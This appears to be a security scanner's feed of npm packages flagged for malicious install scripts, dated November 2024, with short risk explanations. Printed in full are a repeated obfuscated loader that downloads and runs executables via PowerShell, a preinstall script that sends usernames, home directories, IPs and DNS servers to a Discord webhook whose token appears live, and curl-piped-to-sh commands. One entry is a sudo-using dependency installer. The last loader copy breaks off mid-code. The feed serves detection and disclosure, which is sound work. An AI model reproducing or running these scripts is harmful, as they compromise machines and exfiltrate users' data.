
Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

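The code downloads files from remote URLs and executes them using PowerShell and command-line execution, which poses a significant security risk. It could run malicious code on the user's system, exposing sensitive information or giving an attacker unauthorized access to the system. Although the listing is obfuscated, its string table still shows the pieces of the commands: fragments of `powershell -Command "Invoke-WebRequest -Uri '…' -OutFile '…'"` and `"Start-Process '…'"`, fragments of a `github.com` raw-file path, and the file names `cmd.exe` and `runtime.exe`.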

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const 
{exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await 
_0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

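This script downloads a shell script from a remote source and executes it. The downloaded script could contain malicious code that compromises the system, steals sensitive information, or performs harmful actions without the user's consent. Because the URL points at a branch (`refs/heads/main`) rather than a fixed commit, and the download is piped straight into `sh`, whatever that file contains at install time is what runs; nothing is verified first.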

Install script:
curl -fsSL https://raw.githubusercontent.com/bnonni/drpm.tools/refs/heads/main/setup.sh | sh

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This script uses curl to download and execute a shell script from a remote repository. This could potentially run malicious code on the local system without user consent or awareness, thereby compromising the system's security.

Install script:
curl -fsSL https://raw.githubusercontent.com/bnonni/drpm.tools/refs/heads/main/setup.sh | sh

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script attempts to execute system commands that install software packages, using sudo for elevated permissions on Linux systems. This could lead to a security risk if the script is run in an untrusted environment, as it could perform unauthorized installations or modifications to the system. Additionally, it lists specific software installations without checks on the integrity or authenticity of the packages, which may expose the system to malicious software.

Install script:
node node-zerox/scripts/install-dependencies.js
Install script code:
const { exec } = require("child_process");
const { promisify } = require("util");
const fs = require("fs");

// Promise-returning form of child_process.exec. Every command string handed to
// it is interpreted by a shell, so the callers below pass fixed literals only.
const execPromise = promisify(exec);

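/**
 * Run a package-manager command and report any failure under the package's name.
 *
 * @param {string} command - Shell command line handed to execPromise.
 * @param {string} packageName - Human-readable name used in the error message.
 * @returns {Promise<string>} The command's stdout.
 * @throws {Error} When the command cannot be run or exits with a non-zero status.
 */
const installPackage = async (command, packageName) => {
  try {
    // The promisified exec rejects on a non-zero exit status, so the exit status
    // alone decides success. Output on stderr does not: package managers write
    // warnings and progress there on runs that succeed, and treating that as a
    // failure aborted otherwise good installs.
    const { stdout } = await execPromise(command);
    return stdout;
  } catch (error) {
    // Wrap exactly once. The earlier form threw inside the try block and then
    // re-wrapped in this handler, which doubled the "Failed to install" prefix.
    throw new Error(`Failed to install ${packageName}: ${error.message}`);
  }
};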

/**
 * Report whether `sudo` can be used right now without prompting.
 *
 * `sudo -n true` runs a no-op non-interactively: it fails instead of asking for
 * a password, so a rejection here means "no usable sudo" for this process.
 *
 * @returns {Promise<boolean>} true when the probe command succeeds, else false.
 */
const isSudoAvailable = async () =>
  execPromise("sudo -n true").then(
    () => true,
    () => false
  );

/**
 * Probe for Ghostscript, GraphicsMagick and LibreOffice, in that order, and
 * install each one that is missing with the platform's package manager
 * (Homebrew on macOS, apt-get on Linux). On any other platform the user is
 * told to install the tool manually.
 *
 * NOTE(review): this changes system-wide state (and uses sudo when it is
 * available without a prompt). The report this listing comes from shows it
 * wired to the package's postinstall hook, so it runs as a side effect of
 * `npm install` rather than as an explicit user action.
 *
 * Any failure is logged and ends the process with exit status 1.
 *
 * @returns {Promise<void>}
 */
const checkAndInstall = async () => {
  // One row per dependency; rows are handled strictly in this order.
  const dependencies = [
    {
      label: "Ghostscript",
      probe: "gs --version",
      brew: "brew install ghostscript",
      aptWithSudo: "sudo apt-get update && sudo apt-get install -y ghostscript",
      aptPlain: "apt-get update && apt-get install -y ghostscript",
      manual:
        "Please install Ghostscript manually from https://www.ghostscript.com/download.html",
    },
    {
      label: "GraphicsMagick",
      probe: "gm -version",
      brew: "brew install graphicsmagick",
      aptWithSudo: "sudo apt-get update && sudo apt-get install -y graphicsmagick",
      aptPlain: "apt-get update && apt-get install -y graphicsmagick",
      manual:
        "Please install GraphicsMagick manually from http://www.graphicsmagick.org/download.html",
    },
    {
      label: "LibreOffice",
      probe: "soffice --version",
      brew: "brew install --cask libreoffice",
      aptWithSudo: "sudo apt-get update && sudo apt-get install -y libreoffice",
      aptPlain: "apt-get update && apt-get install -y libreoffice",
      manual:
        "Please install LibreOffice manually from https://www.libreoffice.org/download/download/",
    },
  ];

  try {
    const canSudo = await isSudoAvailable();

    for (const dep of dependencies) {
      // A probe that runs cleanly means the tool is already on the PATH.
      const alreadyPresent = await execPromise(dep.probe).then(
        () => true,
        () => false
      );
      if (alreadyPresent) {
        continue;
      }

      switch (process.platform) {
        case "darwin":
          await installPackage(dep.brew, dep.label);
          break;
        case "linux":
          // Without passwordless sudo the plain form is tried as-is; it only
          // succeeds when the process already has the needed privileges.
          await installPackage(canSudo ? dep.aptWithSudo : dep.aptPlain, dep.label);
          break;
        default:
          throw new Error(dep.manual);
      }
    }
  } catch (err) {
    console.error(`Error during installation: ${err.message}`);
    process.exit(1);
  }
};

// Runs as soon as the file is loaded. The returned promise is not awaited here;
// checkAndInstall handles its own errors and exits the process on failure.
checkAndInstall();

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: preinstall
Package Source: ↗️ View on Npm

The code collects sensitive information, including internal and external IP addresses, the user's home directory, username, and DNS servers, and sends this data to a specified Discord webhook. This could be exploited to track users or access their sensitive information without consent.

Install script:
node index.js
Install script code:
const os = require("os");
const dns = require("dns");
const https = require("https");
const packageJSON = require("./package.json");

// Name of this package as declared in its own package.json; sent as the
// `package` field of the report assembled further down.
const package = packageJSON.name;

// Returns the address of the first IPv4 entry from os.networkInterfaces() that
// is not flagged as internal (loopback), or the string 'IP not found' when no
// such entry exists. The value becomes the `internal_ip` field of the report
// that this script sends out.
function getIPAddress() {
    const networkInterfaces = os.networkInterfaces();
    for (const interfaceName in networkInterfaces) {
        const iface = networkInterfaces[interfaceName];
        for (const alias of iface) {
            if (alias.family === 'IPv4' && !alias.internal) {
                return alias.address;
            }
        }
    }
    return 'IP not found';
}

// Asks the third-party service ipinfo.io how this machine appears from the
// internet and passes { ip, hostname, organization } to `callback`.
// On a request error, `callback` receives placeholder strings instead, so the
// caller always proceeds to send its report.
// NOTE(review): for defenders, an HTTPS request to ipinfo.io made by a package
// manager process during installation is an observable signal of this script.
function getExternalIP(callback) {
    https.get('https://ipinfo.io/json', (res) => {
        let data = '';

        // Accumulate the response body as it arrives
        res.on('data', (chunk) => {
            data += chunk;
        });

        // Body complete: parse it as JSON and hand the selected fields over
        res.on('end', () => {
            const parsedData = JSON.parse(data);
            callback({ip: parsedData.ip, hostname: parsedData.hostname, organization: parsedData.org}); // `org` is renamed to `organization` for the report
        });
    }).on('error', (e) => {
        console.error('Error fetching external IP address:', e);
        callback({ip:'External IP not found',hostname:'External hostname not found', organization: 'Organization not found'}); // Placeholders keep the report flowing on failure
    });
}

// Script body: runs when the file is loaded (the report above lists it as the
// package's preinstall script). Once the external-IP lookup returns, it builds
// a host profile and POSTs it to a hard-coded Discord webhook.
//
// Data leaving the machine: package name and version, install directory, the
// user's home directory and username, configured DNS servers, hostname,
// internal and external IP, the external hostname and organization reported by
// ipinfo.io, and the entire package.json object.
//
// NOTE(review): nothing here asks for or records consent, and the script has no
// other function. For detection, look for install-time HTTPS POSTs to
// discord.com/api/webhooks/ originating from node/npm processes.
getExternalIP((externalIP) => {
    const trackingData = JSON.stringify({
        package: package,
        directory: __dirname,
        home_directory: os.homedir(),
        username: os.userInfo().username,
        dns: dns.getServers(),
        internal_hostname: os.hostname(),
        internal_ip: getIPAddress(), // First non-internal IPv4 address of the host
        external_ip: externalIP.ip, // As reported by ipinfo.io
        external_hostname: externalIP.hostname,
        organization: externalIP.organization,
        // Reads a `___resolved` key from package.json; presumably the URL the
        // package was resolved from — verify against a real install.
        resolved_url: packageJSON ? packageJSON.___resolved : undefined,
        package_version: packageJSON.version,
        package_json: packageJSON,
        package_type: 'npm',
    });

    // Destination of the report: a Discord webhook whose id and token are embedded in the URL.
    const webhookURL = "https://discord.com/api/webhooks/1301084955144618004/dzBF_mUG0Ob7MXPUjc3j4cbfOxRF8aquDty3TZCzVy7y-Pjh78fkwe_z1JezoYhAOv89"; // Replace with your Discord webhook URL

    const postData = JSON.stringify({
        content: `\`\`\`json\n${trackingData}\n\`\`\`` // The profile is posted as a fenced JSON block in a Discord message
    });

    // The parsed URL object doubles as the request options; method and headers
    // are attached to it directly.
    const options = new URL(webhookURL);

    options.method = "POST";
    options.headers = {
        "Content-Type": "application/json",
        "Content-Length": postData.length,
    };

    const req = https.request(options, (res) => {
        // Any response body from the webhook is echoed to the install output.
        res.on("data", (d) => {
            process.stdout.write(d);
        });
    });

    // A failed upload is only logged; it does not fail the installation.
    req.on("error", (e) => {
        console.error(e);
    });

    req.write(postData);
    req.end();
});

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This command downloads a shell script from a remote source (GitHub) and executes it directly in the shell without any validation. This is dangerous because the downloaded script could contain malicious code that can compromise the system or steal sensitive information.

Install script:
curl -fsSL https://raw.githubusercontent.com/bnonni/drpm.tools/refs/heads/main/setup.sh | sh

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This code appears to download files from a remote, potentially malicious source and execute them. It uses PowerShell commands to run the downloaded files, which can lead to the execution of arbitrary code on the system, compromising security and potentially giving an attacker control of the machine.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const 
{exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await 
_0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code contains a function that downloads executable files from specified URLs and runs them using PowerShell on the system. This poses a significant risk as it could execute malicious code, allowing an attacker to take control of the system or steal sensitive information.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const 
{exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await 
_0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code downloads and executes files from remote URLs and runs commands through PowerShell and cmd (in the listing, `cmd.exe` also appears as the name of one of the downloaded files). This poses a significant security risk as it can be used to remotely execute malicious code on the system, potentially leading to unauthorized access, data theft, or system compromise.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const 
